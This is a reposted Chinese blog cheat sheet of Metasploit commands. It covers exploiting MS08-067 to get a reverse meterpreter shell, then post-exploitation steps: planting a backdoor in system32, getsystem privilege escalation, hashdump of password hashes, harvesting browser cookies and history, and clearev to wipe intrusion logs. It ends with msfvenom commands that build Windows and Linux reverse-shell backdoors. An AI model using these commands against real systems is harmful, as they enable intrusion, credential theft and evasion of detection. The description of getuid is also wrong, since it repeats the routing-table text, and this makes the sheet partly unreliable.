【收藏】MSF常用命令
原文:https://blog.csdn.net/weixin_42140534/article/details/117551767
msf获取shell
启动 msfconsole 搜索某个模块 search ms08-067 使用某个模块 use exploit/windows/smb/ms08-067_netapi 查看当前模块可以使用的payload[可以省略] show payloads 查看当前模块需要的参数配置 show options[可略] 选择反弹shell的模块 set payload windows/meterpreter/reverse_tcp 设置目标的IP地址 set RHOST 192.168.10.1 设置本地的IP地址 set LHOST 192.168.1.1 设置本地的监听端口 set LPORT 8888 show targets 查看metasploit的渗透攻击模块通常可以列出受到漏洞影响的目标系统类型。 如某些漏洞只适用特定系统的某些版本,这时可以根据目标的操作类型版本来设置版本 set target 1 进行攻击 run/exploit,这样就返回一个meterpreter
meterpreter常用命令
1、background:把meterpreter后台挂起 2、sessions:查看已经成功获取的会话 sessions -i +num :连接到指定序列号的meterpreter会话继续利用 sessions -i 2:连接第三个会话主机 3、shell:获取目标主机的远程命令行shell,使用exit退出当前的shell 4、cat:查看目标主机上的文档内容 cat c:/test.txt 5、getwd:获取系统工作的当前目录 6、upload:上传文件到目标主机 upload setup.exe c:\\windows\\system32\ 把后门程序setup.exe上传到目标主机的system32目录下 7、download:把目标主机上的文件下载到我们的攻击主机上 download C:\\boot.in /root/ 把目标主机c盘根目录下的boot.ini文件下载到攻击主机的/root/目录下 8、edit:调用vi编辑器,对目标主机的文件进行修改 edit C:/Windows/System32/drivers/etc/hosts 修改目标主机的hosts文件 9、search: 再目标主机上搜索文件 search -d c:\\ -f *.doc 在目标主机的C盘下搜索doc文档 10、ipconfig/ifconfig:查看目标主机上的网络参数 11、portfwd:端口转发,把目标主机的3389端口转发到其他端口 portfwd add -l 1122 -p 3389 -r 192.168.10.1 把目标主机的3389端口转发到192.168.10.1的1122端口,访问192.168.10.1:1122就能打开目标主机的远程桌面 12、route:显示目标主机上的主机路由表 13、getuid:显示目标主机上的主机路由表 14、sysinfo:查看目标主机的系统信息 15、getpid:获取meterpreter会话在 目标主机上的注入进程的进程号 16、migrate:将meterpreter会话进程移植到另外一个进程 如果我们反弹的meterpreter会话是对方打开了一个预设代码的word文档产生的,如果对方一旦关闭该word文档,我们获取的meterpreter会话就 会关闭,所以我们需要把会话进程注入到explorer.exe(桌面进程 先用ps 查看explorer.exe进程的pid为 xxx, 然后执行 migrate xxx 17、execute:在目标主机上运行某个程序 execute -f -i -H cmd.exe 以隐藏的方式运行cmd.exe 18、shutdown:关闭目标主机 19、getsystem:使用该命令提升当前进程的执行账户为system用户, 拿到系统的最高权限 20、hashdump:在获得system权限的情况下,使用hashdump命令可以得到目标的SAM文件,获取目标主机账号密码的hash信息 21、run post/windows/gather/checkvm 在meterpreter下run post/windows/gather/checkvm 检测是否为一台虚拟机 22、run post/windows/gather/enum_applications 在meterpreter下run post/windows/gather/enum_applications 获取目标主机上的软件安装信息 23、run post/windows/gather/dumplinks 在meterpreter下run post/windows/gather/dumplinks 获取目标主机最近访问过的文档、链接等信息 24、run post/windows/gather/enum_ie 在meterpreter下run post/windows/gather/enum_ie 获取到的目标主机上的ie浏览器缓存历史记录和cookies信息等都保存到了攻击主机本地的/root/.msf5/loot/目录下 25、clearev命令:入侵痕迹清除
MSF生成后门
1、生成windows后门: msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击端口 -f exe -o /tmp/hack.exe 2、生成linux后门 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击ip LPORT=攻击端口 -f elf > shell.elf use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.53 set LPORT 4444 exploit